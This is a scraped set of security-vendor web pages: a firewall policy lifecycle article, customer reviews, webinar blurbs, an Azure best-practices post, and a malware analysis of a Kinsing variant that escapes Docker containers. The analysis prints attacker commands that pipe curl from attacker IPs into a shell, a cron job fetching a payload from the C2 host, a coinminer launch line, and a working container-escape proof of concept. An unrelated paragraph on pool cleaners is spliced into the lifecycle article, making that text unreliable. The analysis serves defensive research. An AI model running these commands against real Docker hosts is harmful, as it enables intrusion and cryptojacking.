way. Nor is it necessary for businesses to accept greater security risk to satisfy the demand for speed. Accelerating agility without sacrificing security The solution is to manage application connectivity and network security policies through a structured lifecycle methodology, which ensures that the right security policy management activities are performed in the right order, through an automated, repeatable process. This dramatically speeds up application connectivity provisioning and improves business agility, without sacrificing security and compliance. So, what is the network security policy management lifecycle, and how should network and security teams implement a lifecycle approach in their organizations? Discover and visualize The first stage involves creating an accurate, real-time map of application connectivity and the network topology across the entire organization, including on-premise, cloud, and software-defined environments. Without this information, IT staff are essentially working blind, and will inevitably make mistakes and encounter problems down the line. Security policy management solutions can automate the application connectivity discovery, mapping, and documentation processes across the thousands of devices on networks – a task that is enormously time-consuming and labor-intensive if done manually. In addition, the mapping process can help business and technical groups develop a shared understanding of application connectivity requirements. Plan and assess Once there is a clear picture of application connectivity and the network infrastructure, you can start to plan changes more effectively – ensure that proposed changes will provide the required connectivity, while minimizing the risks of introducing vulnerabilities, causing application outages, or compliance violations. Typically, it involves translating application connectivity requests into networking terminology, analyzing the network topology to determine if the changes are really needed, conducting an impact analysis of proposed rule changes (particularly valuable with unpredictable cloud-based applications), performing a risk and compliance assessment, and assessing inputs from vulnerabilities scanners and SIEM solutions. Automating these activities as part of a structured lifecycle keeps data up-to-date, saves time, and ensures that these critical steps are not omitted – helping avoid configuration errors and outages. Functions Of An Automatic Pool Cleaner An automatic pool cleaner is very useful for people who have a bad back and find it hard to manually operate the pool cleaner throughout the pool area. This type of pool cleaner can move along the various areas of a pool automatically. Its main function is to suck up dirt and other debris in the pool. It functions as a vacuum. Automatic pool cleaners may also come in different types and styles. These include automatic pressure-driven cleaners, automatic suction side-drive cleaners, and robotic pool cleaners. Migrate and deploy Deploying connectivity and security rules can be a labor-intensive and error-prone process. Security policy management solutions automate the critical tasks involved, including designing rule changes intelligently, automatically migrating rules, and pushing policies to firewalls and other security devices – all with zero-touch if no problems or exceptions are detected. Crucially, the solution can also validate that the intended changes have been implemented correctly. This last step is often neglected, creating the false impression that application connectivity has been provided, or that vulnerabilities have been removed, when in fact there are time bombs ticking in the network. Maintain Most firewalls accumulate thousands of rules which become outdated or obsolete over the years. Bloated rulesets not only add complexity to daily tasks such as change management, troubleshooting and auditing, but they can also impact the performance of firewall appliances, resulting in decreased hardware lifespan and increased TCO. Cleaning up and optimizing security policies on an ongoing basis can prevent these problems. This includes identifying and eliminating or consolidating redundant and conflicting rules; tightening overly permissive rules; reordering rules; and recertifying expired ones. A clean, well-documented set of security rules helps to prevent business application outages, compliance violations, and security gaps and reduces management time and effort. Decommission Every business application eventually reaches the end of its life: but when they are decommissioned, its security policies are often left in place, either by oversight or from fear that removing policies could negatively affect active business applications. These obsolete or redundant security policies increase the enterprise’s attack surface and add bloat to the firewall ruleset. The lifecycle approach reduces these risks. It provides a structured and automated process for identifying and safely removing redundant rules as soon as applications are decommissioned while verifying that their removal will not impact active applications or create compliance violations. We recently published a white paper that explains the five stages of the security policy management lifecycle in detail. It’s a great primer for any organization looking to move away from a reactive, fire-fighting response to security challenges, to an approach that addresses the challenges of balancing security and risk with business agility. Download your copy here . Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

In this guest blog, Jeff Yager from IT Central Station (soon to be PeerSpot), discusses how actual AlgoSec users have been able to... Security Policy Management Securely accelerating application delivery Jeff Yeger 2 min read Jeff Yeger Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/15/21 Published In this guest blog, Jeff Yager from IT Central Station (soon to be PeerSpot), discusses how actual AlgoSec users have been able to securely accelerate their app delivery. These days, it is more important than ever for business owners, application owners, and information security professionals to speak the same language. That way, their organizations can deliver business applications more rapidly while achieving a heightened security posture. AlgoSec’s patented platform enables the world’s most complex organizations to gain visibility and process changes at zero-touch across the hybrid network. IT Central Station members discussed these benefits of AlgoSec , along with related issues, in their reviews on the site. Application Visibility AlgoSec allows users to discover, identify, map, and analyze business applications and security policies across their entire networks. For instance, Jacob S., an IT security analyst at a retailer, reported that the overall visibility that AlgoSec gives into his network security policies is high. He said, “It’s very clever in the logic it uses to provide insights, especially into risks and cleanup tasks . It’s very valuable. It saved a lot of hours on the cleanup tasks for sure. It has saved us days to weeks.” “AlgoSec absolutely provides us with full visibility into the risk involved in firewall change requests,” said Aaron Z. a senior network and security administrator at an insurance company that deals with patient health information that must be kept secure. He added, “There is a risk analysis piece of it that allows us to go in and run that risk analysis against it, figuring out what rules we need to be able to change, then make our environment a little more secure. This is incredibly important for compliance and security of our clients .” Also impressed with AlgoSec’s overall visibility into network security policies was Christopher W., a vice president – head of information security at a financial services firm, who said, “ What AlgoSec does is give me the ability to see everything about the firewall : its rules, configurations and usage patterns.” AlgoSec gives his team all the visibility they need to make sure they can keep the firewall tight. As he put it, “There is no perimeter anymore. We have to be very careful what we are letting in and out, and Firewall Analyzer helps us to do that.” For a cyber security architect at a tech services company, the platform helps him gain visibility into application connectivity flows. He remarked, “We have Splunk, so we need a firewall/security expert view on top of it. AlgoSec gives us that information and it’s a valuable contributor to our security environment.” Application Changes and Requesting Connectivity AlgoSec accelerates application delivery and security policy changes with intelligent application connectivity and change automation. A case in point is Vitas S., a lead infrastructure engineer at a financial services firm who appreciates the full visibility into the risk involved in firewall change requests. He said, “[AlgoSec] definitely allows us to drill down to the level where we can see the actual policy rule that’s affecting the risk ratings. If there are any changes in ratings, it’ll show you exactly how to determine what’s changed in the network that will affect it. It’s been very clear and intuitive.” A senior technical analyst at a maritime company has been equally pleased with the full visibility. He explained, “That feature is important to us because we’re a heavily risk-averse organization when it comes to IT control and changes. It allows us to verify, for the most part, that the controls that IT security is putting in place are being maintained and tracked at the security boundaries .” A financial services firm with more than 10 cluster firewalls deployed AlgoSec to check the compliance status of their devices and reduce the number of rules in each of the policies. According to Mustafa K. their network security engineer, “Now, we can easily track the changes in policies. With every change, AlgoSec automatically sends an email to the IT audit team. It increases our visibility of changes in every policy .” Speed and Automation The AlgoSec platform automates application connectivity and security policy across a hybrid network so clients can move quickly and stay secure. For Ilya K., a deputy information security department director at a computer software company, utilizing AlgoSec translates into an increase in security and accuracy of firewall rules. He said, “ AlgoSec ASMS brings a holistic view of network firewall policy and automates firewall security management in very large-sized environments. Additionally, it speeds up the changes in firewall rules with a vendor-agnostic approach.” “The user receives the information if his request is within the policies and can continue the request,” said Paulo A., a senior information technology security analyst at an integrator. He then noted, “Or, if it is denied, the applicant must adjust their request to stay within the policies. The time spent for this without AlgoSec is up to one week, whereas with AlgoSec, in a maximum of 15 minutes we have the request analyzed .” The results of this capability include greater security, a faster request process and the ability to automate the implementation of rules. Srdjan, a senior technical and integration designer at a large retailer, concurred when he said, “ By automating some parts of the work, business pressure is reduced since we now deliver much faster . I received feedback from our security department that their FCR approval process is now much easier. The network team is also now able to process FCRs much faster and with more accuracy.” To learn more about what IT Central Station members think about AlgoSec, visit https://www.itcentralstation.com/products/algosec-reviews Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Compliance made easy Pass your audits stress free AlgoSec Webinar Webinars Compliance made easy. Pass your audits stress-free. Don’t fail an audit ever again. Yes, it’s possible. It doesn’t matter what regulation you are talking about, whether your own internal compliance standard or a common global framework such as PCI DSS, SOX, HIPPA, SWIFT, or even HKMA. We’ll show you how. In this webinar, AlgoSec security expert Tal Dayan will reveal: The secrets to passing audits How to improve your compliance score How to always remain compliant January 27, 2021 Tal Dayan AlgoSec security expert Relevant resources Network Security Audit? Passing Your Next One with Flying Colors Keep Reading Network Security Audit? Passing Your Next One with Flying Colors Keep Reading Regulations and compliance for the data center - A Day in the Life Read Document Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Azure Security Best Practices: Don't Get Caught with Your Cloud Pants Down   Executive Summary   The cloud isn't some futuristic fantasy... Cloud Security Azure Security Best Practices Asher Benbenisty 2 min read Asher Benbenisty Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/25/24 Published Azure Security Best Practices: Don't Get Caught with Your Cloud Pants Down Executive Summary The cloud isn't some futuristic fantasy anymore, folks. It's the backbone of modern business, and Azure is charging hard, fueled by AI, to potentially dethrone AWS by 2026. But with this breakneck adoption comes a harsh reality: security can't be an afterthought. This article dives deep into why robust security practices are non-negotiable in Azure and how tools like Microsoft Sentinel and Defender XDR can be your digital bodyguards. Introduction Let's face it, organizations are flocking to the cloud like moths to a digital flame. Why? Cost savings, streamlined operations, and the ability to scale at warp speed. We're talking serious money here – a projected $805 billion spent on public cloud services in 2024! The cloud's not just disrupting the game; it is the game. And the playing field is shifting. AWS might be the king of the hill right now, but Azure's hot on its heels, thanks to some serious AI muscle. ( As of 2024, they hold market shares of 31%, 24%, and 11%, respectively .) Forbes even predicts an Azure takeover by 2026. Exciting times, right? Hold your horses. This rapid cloud adoption has a dark side. Security threats are lurking around every corner, and sticking to best practices is more crucial than ever. Cloud service managers, listen up: you need to wrap your heads around the shared responsibility model (Figure 1). Think of it like this: you and Azure are partners in crime prevention. You're both responsible for keeping your digital assets safe, but you need to know who's holding which piece of the security puzzle. Don't assume security is built-in – it's a team effort, and you need to pull your weight. Figure 1: The shared responsibility model Azure's Security Architecture: A Fortress in the Cloud Okay, I get it. The shared responsibility model can feel like navigating a maze blindfolded. But here's the deal: whether you're dabbling in IaaS, PaaS, or SaaS, Azure's got your infrastructure covered. Their global network of data centers is built like Fort Knox, meeting industry standards like ISO/IEC 27001:2022 , HIPAA , and NIST SP 800-53 . But remember your part of the bargain! Azure provides a killer arsenal of security products to protect your workloads, both in Azure and beyond. Figure 2: Azure’s security architecture Take Microsoft Sentinel, for example. This superhero of a tool automatically sniffs out threats, investigates them, and neutralizes them before they can wreak havoc. It's like having a 24/7 security team with superhuman senses. And don't forget about Microsoft Defender XDR. This comprehensive security suite is like a digital Swiss Army knife, protecting your identities, endpoints, applications, email, and cloud apps. It's got your back, no matter where you turn. With Sentinel and Defender XDR in your corner, you're well-equipped to tackle the security challenges that come with cloud adoption. But don't get complacent! Let's dive into some core security best practices that will make your Azure environment an impenetrable fortress. Core Security Best Practices: Lock Down Your Secrets Protecting Secrets: Best Practices Using Azure Key Vault We all have secrets, right? In the digital world, those secrets are things like passwords, API keys, and encryption keys. You can't just leave them lying around for any cybercriminal to snatch. That's where Azure Key Vault comes in. This secure vault is like a digital safe deposit box for your sensitive data. It uses hardware security modules (HSMs) to keep your secrets locked down tight, even if someone manages to breach your defenses. Big names like Victoria's Secret & Co , Evup, and Sage trust Key Vault to keep their secrets safe. Figure 3: A new Key Vault named “algosec-kv” Here's a pro tip: once you've stashed your secrets in Key Vault, use a managed identity to access them. This eliminates the need to hardcode credentials in your code, minimizing the risk of exposure. var client = new SecretClient(new Uri("https://. vault.azure.net/ "), new DefaultAzureCredential(),options); KeyVaultSecret secret = client.GetSecret(""); string secretValue = secret.Value; Key Vault is a fantastic tool, but it's not a silver bullet. Download our checklist of additional best practices to keep your secrets safe: Database and Data Security: More Than Just Locking the Door Azure offers a smorgasbord of data storage solutions, from Azure SQL Database to Azure Blob Storage. But securing your data isn't just about protecting it at rest. You need to think about data in use and data in transit, too. Download our checklist for a full action plan: Identity Management: Who Are You, and What Are You Doing Here? Encryption is great, but it's only half the battle. You need to know who's accessing your resources and what they're doing. That's where identity access management (IAM) comes in. Think of IAM as a digital bouncer, controlling access to your network resources. It's all about verifying identities and granting the right level of access – no more, no less. Zero-trust network access (ZTNA) is your secret weapon here. It's like having a security checkpoint at every corner of your network, ensuring that only authorized users can access your resources. Figure 4: Zero-trust security architecture Remember the Capital One breach? A misconfigured firewall and overly broad permissions led to a massive data leak. Don't let that be you! Follow Azure's IAM documentation to build a robust and secure identity management system. Network Security: Building a Digital Moat Your network architecture is the foundation of your security posture. Choose wisely, my friends! The hub-spoke model is a popular choice in Azure, centralizing common services in a secure hub and isolating workloads in separate spokes. Figure 5: Hub-spoke network architecture in Azure (Source: Azure documentation ) For a checklist of how the hub-spoke model can boosts your security, download our checklist here. Digital Realty , a real estate investment giant, uses the hub-spoke model to secure its global portal and REST APIs. It's a testament to the power of this architecture for both security and performance. Figure 6: Digital Realty’s use of hub-spoke architecture (Adapted from Microsoft Customer Stories ) Operational Security: Stay Vigilant, Stay Secure (Continued) When a security incident strikes, your response time is critical. Think of operational security as your digital first aid kit. It's about minimizing human error and automating processes to speed up threat detection and response. We've already talked about MFA, password management, and the dynamic duo of Defender XDR and Sentinel. Download our checklist for a few more operational security essentials to add to your arsenal. Figure 7: Build-deploy workflow automation (Source: Azure documentation ) Think of these best practices as guardrails, guiding you toward secure decisions. But remember, flexibility is key. Adapt these practices to your specific environment and architecture. Conclusion As Azure's popularity skyrockets, so do the stakes. The shared responsibility model means you're not off the hook when it comes to security. Azure provides powerful tools like Sentinel and Defender XDR, but it's up to you to use them wisely and follow best practices. Protect your secrets like they're buried treasure, secure your data with Fort Knox-level encryption, implement identity management that would make a border patrol agent proud, and build a network architecture that's a digital fortress. And don't forget about operational security – it's the glue that holds it all together. But let's be real, managing security policies across multiple clouds can be a nightmare. That's where tools like AlgoSec CloudFlow come in. They provide a clear view of your security landscape, helping you identify vulnerabilities and streamline policy management. It's like having a security command center for your entire cloud infrastructure. So, what are you waiting for? Request a demo today and let AlgoSec help you build an Azure environment that's so secure, even the most determined cybercriminals will be left scratching their heads. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Learn best practices to secure your cloud environment and deliver applications securely Webinars State of Ransomware: Caught between perception and reality Ransomware continues to be a major problem—and the problem is only getting worse. An exclusive ExtraHop 2022 survey conducted with over 500 security and IT decision makers provided some sobering responses: 85% of those surveyed reported suffering at least one ransomware attack while an alarming 74% have experienced multiple attacks. Yet most IT decision makers (77%) are confident in their ability to prevent or mitigate all cybersecurity threats, including ransomware. In this webinar, we take an in-depth look into the implications of this alarming trend and provide a turnkey strategy that organizations can implement today to safeguard their most critical data stored in their business applications and increase their level of ransomware preparedness. Join us for: * In-depth analysis of infamous ransomware attacks * Ways to identify and remediate vulnerabilities at the application level * A practical application centric approach that can support your pre-existing security measures * Mitigation measures to consider at the onset of your next ransomware attack * Ransomware future trends predictions January 24, 2023 Eric Jeffery Regional Sales Engineer Relevant resources Reducing risk of ransomware attacks - back to basics Keep Reading Fighting Ransomware - CTO Roundtable Insights Keep Reading Ransomware Attack: Best practices to help organizations proactively prevent, contain and Keep Reading Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue